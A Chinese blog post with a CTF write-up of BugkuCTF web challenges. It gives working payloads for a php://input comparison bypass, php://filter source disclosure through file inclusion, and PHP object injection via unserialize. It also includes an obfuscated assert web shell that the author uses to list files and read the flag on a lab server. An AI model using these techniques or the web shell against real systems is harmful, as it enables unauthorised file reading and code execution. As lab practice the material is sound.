bugkuCTF Writeup (Web)26-29

最新推荐文章于 2024-05-11 02:11:37 发布
最新推荐文章于 2024-05-11 02:11:37 发布
阅读量3.1k 收藏 2
点赞数
分类专栏: CTF 文章标签: CTF Web PHP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/troublor/article/details/79189123
版权

never give up

这里写图片描述
看源码,有提示<!--1p.html-->
去看1p.html的源码


<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--


var Words ="%3Cscript%3Ewindow.location.href%3D%27http%3A//www.bugku.com%27%3B%3C/script%3E%20%0A%3C%21--JTIyJTNCaWYlMjglMjElMjRfR0VUJTVCJTI3aWQlMjclNUQlMjklMEElN0IlMEElMDloZWFkZXIlMjglMjdMb2NhdGlvbiUzQSUyMGhlbGxvLnBocCUzRmlkJTNEMSUyNyUyOSUzQiUwQSUwOWV4aXQlMjglMjklM0IlMEElN0QlMEElMjRpZCUzRCUyNF9HRVQlNUIlMjdpZCUyNyU1RCUzQiUwQSUyNGElM0QlMjRfR0VUJTVCJTI3YSUyNyU1RCUzQiUwQSUyNGIlM0QlMjRfR0VUJTVCJTI3YiUyNyU1RCUzQiUwQWlmJTI4c3RyaXBvcyUyOCUyNGElMkMlMjcuJTI3JTI5JTI5JTBBJTdCJTBBJTA5ZWNobyUyMCUyN25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJTI3JTNCJTBBJTA5cmV0dXJuJTIwJTNCJTBBJTdEJTBBJTI0ZGF0YSUyMCUzRCUyMEBmaWxlX2dldF9jb250ZW50cyUyOCUyNGElMkMlMjdyJTI3JTI5JTNCJTBBaWYlMjglMjRkYXRhJTNEJTNEJTIyYnVna3UlMjBpcyUyMGElMjBuaWNlJTIwcGxhdGVmb3JtJTIxJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuJTI4JTI0YiUyOSUzRTUlMjBhbmQlMjBlcmVnaSUyOCUyMjExMSUyMi5zdWJzdHIlMjglMjRiJTJDMCUyQzElMjklMkMlMjIxMTE0JTIyJTI5JTIwYW5kJTIwc3Vic3RyJTI4JTI0YiUyQzAlMkMxJTI5JTIxJTNENCUyOSUwQSU3QiUwQSUwOXJlcXVpcmUlMjglMjJmNGwyYTNnLnR4dCUyMiUyOSUzQiUwQSU3RCUwQWVsc2UlMEElN0IlMEElMDlwcmludCUyMCUyMm5ldmVyJTIwbmV2ZXIlMjBuZXZlciUyMGdpdmUlMjB1cCUyMCUyMSUyMSUyMSUyMiUzQiUwQSU3RCUwQSUwQSUwQSUzRiUzRQ%3D%3D--%3E" 
function OutWord()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
} 
OutWord();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>

Words变量的值先url解码,再base64解码,再url解码,得

";if(!$_GET['id'])
{
    header('Location: hello.php?id=1');
    exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{
    echo 'no no no no no no no';
    return ;
}
$data = @file_get_contents($a,'r');
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
    require("f4l2a3g.txt");
}
else
{
    print "never never never give up !!!";
}


?>

绕过:payload:http://120.24.86.145:8006/test/hello.php?id=0sdvdsd&a=php://input&b=.sdfasdfsdafsdfrdfgsdgasdftgssd
postdata:bugku is a nice plateform!
得flag:
这里写图片描述

welcome to bugkuctf

这里写图片描述
查看网页源代码,发现是php代码审计

$user = $_GET["txt"];  
$file = $_GET["file"];  
$pass = $_GET["password"];  

if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){  
    echo "hello admin!<br>";  
    include($file); //hint.php  
}else{  
    echo "you are not admin ! ";  
}

文件包含漏洞,要用include函数看hint.php的内容
payload:http://120.24.86.145:8006/test1/?txt=php://input&file=hint.php&password
postdata带上welcome to the bugkuctf
提交,显示了这个
这里写图片描述
似乎还是一样的,那就看index.php吧
payload:http://120.24.86.145:8006/test1/?txt=php://input&file=index.php&password
postdata带上welcome to the bugkuctf
提交,得无数个hello friend
这里写图片描述
不明所以,继续去看flag.php,发现作者很狡猾
这里写图片描述
看来不能让hint.php执行
所以payload:http://120.24.86.145:8006/test1/?txt=php://input&file=php://filter//read=convert.base64-encode/resource=./hint.php&password=
postdata带上welcome to the bugkuctf
获得hint.php源码的base64编码,解码得:

<?php 

class Flag{//flag.php
    public $file;  
    public function __tostring(){ 
        if(isset($this->file)){ 
            echo file_get_contents($this->file); 
            echo "<br>";
            return ("good");
        }  
    }  
}  
?>

再去看index.php源码(不让它执行)

<?php
$txt = $_GET["txt"];
$file = $_GET["file"];
$password = $_GET["password"];

if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){
    echo "hello friend!<br>";
    if(preg_match("/flag/",$file)){
        echo "\xe4\xb8\x8d\xe8\x83\xbd\xe7\x8e\xb0\xe5\x9c\xa8\xe5\xb0\xb1\xe7\xbb\x99\xe4\xbd\xa0flag\xe5\x93\xa6";
        exit();
    }else{
        include($file);
        $password = unserialize($password);
        echo $password;
    }
}else{
    echo "you are not the number of bugku ! ";
}
?>

这就好办了,传入参数password,要传入一个Flag类对象的序列化值,当然file属性是”flag.php”了
payload:http://120.24.86.145:8006/test1/?txt=php://input&file=hint.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
postdata带上welcome to the bugkuctf,获得flag
这里写图片描述

login1

这个一直没打开,就先跳过去了

过狗一句话

这里写图片描述
题目提示里的php代码拿下来

<?php $poc = "a#s#s#e#r#t";
$poc_1 = explode("#", $poc);
$poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . $poc_1[3] . $poc_1[4] . $poc_1[5];
$poc_2($_GET['s'])
?>

用assert执行任意代码
这就很自由了
payload:http://120.24.86.145:8010/?s=print_r(scandir('./')); 扫描目录
这里写图片描述
然后读取flag.txt
payload:http://120.24.86.145:8010/?s=print_r(file_get_contents('flag.txt'));
这里写图片描述

Troublor
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BugkuCTF练习题解——Web
qq_41739275的博客
08-24 5890
文章目录1.Web22.计算器3.Web基础$_GET4.Web基础$_POST5.矛盾6.Web37.域名解析8.你必须让他停下9.本地包含10.变量111.Web512.头等舱13.网站被黑14.管理员系统15.Web416.flag在index中17.输入密码查看flag18.点击100万次19.备份是个好习惯 1.Web2 打开链接之后是滑稽笑脸,好家伙,吓我一跳,还以为是大bug,然后也没有提示啥的 感觉有点无从下手???别急,打开页面源代码(检查元素也可)瞅瞅 注释部分就是flag了。 2.
Bugku-CTF-shell-过狗一句话
kaixinXQ的博客
08-08 397
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) 点击题目: 读取PHP下面的文件: print_r(scandir($dir)),还可以利用print_r(glob("*.*")) 访问txt文件:http://114.67.246.176:16100/.
BugkuCTF:过狗一句话(web
s0il的博客
04-19 2441
题目描述: 上面的php进行格式化之后: <?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_...
2024年最全CTF BugKu平台—(Web篇①)_ctf bugku web(1),金三银四我带你去BAT面试现场
最新发布
2401_84281698的博客
05-11 666
白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!即num既不能是数字字符,但是要等于1,我们可以想到用科学计数法表示数字1,既不是纯数字,其值又等于1因此。这里的sign显示是加密的。这里是zMNTA,这里我好几次都是zM开头的 ==结束的,查看源代码。弱密码top1000?是一个弹窗 F12 找到一些线索,估计是编码,看了一下下面的评论知道是Unicode编码。通过url传入what的值,让其等于flag,直接构造url就得到flag。
BUGKU-CTF入门笔记
Emooooor的博客
12-02 675
CTFBUGKU、入门、夺旗赛、网络安全、web安全
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
bugku ctf misc wp.pdf
07-05
bugku ctf misc wp.pdf
Codefest'2019 CTF writeup-b64_c3VuJTIwYm95.docx
11-29
Codefest'2019 CTF writeup
D3CTF2022-官方WriteUp1
08-03
本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序列化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User-Defined Functions(UDF)...
BugkuCTF web
weixin_45689999的博客
01-19 758
1.web2 先打开F12看看,很容易发现在注释里面有flag。 把flag后面内容输入即可。 2.计算器 发现是一道及其简单的计算题(要是手上没有计算器有些题比较难算的话,可以点击题目换一道蛤,但是怎么换答案都是两位数以上的),输入答案,发现只能输入一位数,打开F12 发现他可输入字符长度为1,双击修改成10等位数,再输入正确答案,flag就出现了。 3.web基础-GET变量参考以下网址了解_...
BUGkuCTF
bigbigworld666的博客
06-26 1352
BUGkuCTF (一)WEB (1)web2 进入环境,首先看源码,在里面直接找到flag [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-97sg5F09-1593143273882)(file:///C:/Users/HP/AppData/Local/Temp/msohtmlclip1/01/clip_image002.gif)] (2)计算器 首先输入数字发现只能输入1个,所以F12去修改源码,将maxlength修改,然后填入正确数字即可出现flag [外链图片转存失
bugkuCTF
YenKoc的博客
10-18 188
这题说实话我一脸懵逼,计网还没学的我,瑟瑟发抖,赶紧去百度。 思路分析: 涉及到域名解析,也就是dns服务,看了看writeup,都是修改host文件,百度了下host文件的作用,才明白了 host文件是作用是定义了本机上ip和域名之间的关系,一般当我们上网一时都是输入域名:www.xxx.com,会有dns服务器帮我们解析成ip,但是会先从host文件里面去找是否有映射关系,如果没有才会去拜托...
BugkuCTF-社工
1stPeak's Blog
08-22 2160
好久不做题目了,慢慢来,先来点简单的 1、密码 盲猜一个zs19980315(看的qwq) 2、信息查找 题解:直接按他的要求去搜 3、简单个人信息收集 附件链接https://pan.baidu.com/s/1l9907EUd6tBaScCsYW8QwQ 提取码:7gzg 看别人wp原来这题还有伪加密的,现在没了,想了解的,看文章底部的链接 社工库查询:http://site3.sjk.space/dosfz.php 4、社工进阶 题解:百度搜索孤长离,发现有个贴吧 看到163,我们想到
BugkuCTF多种方法解决
qq_40624810的博客
06-09 4224
链接下载压缩包,解压后得到一个zip压缩包,解压后是个exe文件,无法打开。放入winhex下分析,右边是一串类似base64编码的字符串。 题目说在做题过程中会得到一个二维码图片,百度了下图片和base64可以转化。用在线工具转化可以得到一个二维码扫描就是flag. 注意在用转化工具的时候要追加img标签。 ...
BugKu Web26-35)
kid的博客
09-11 960
BugKu Web26-35) 前言 发现以前做了几道题,然后凑成了10道写一下。确实做起来会发现和比赛的题相比质量还是要差很多。 但对于我这样的菜鸟拿来练习打打基础还是可以的 题目 过狗一句话 可以看到提示,给了一个一句话马,简化一下就是assert($_GET[‘s’])这么一个一句话 assert没怎么用过… 查了下可以用下面的函数来搜寻目录 scandir() //作用能扫描文...
bugkuCTF Writeup (Web)15-21
Troublor的博客
01-25 4770
Web4 看源代码,一大堆东西解码,发现eval执行的是: function checkSubmit() { var a = document.getElementById("password"); if ("undefined" != typeof a) { if ("67d709b2b54aa2aa648cf6e87a7114f1" == a.val
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值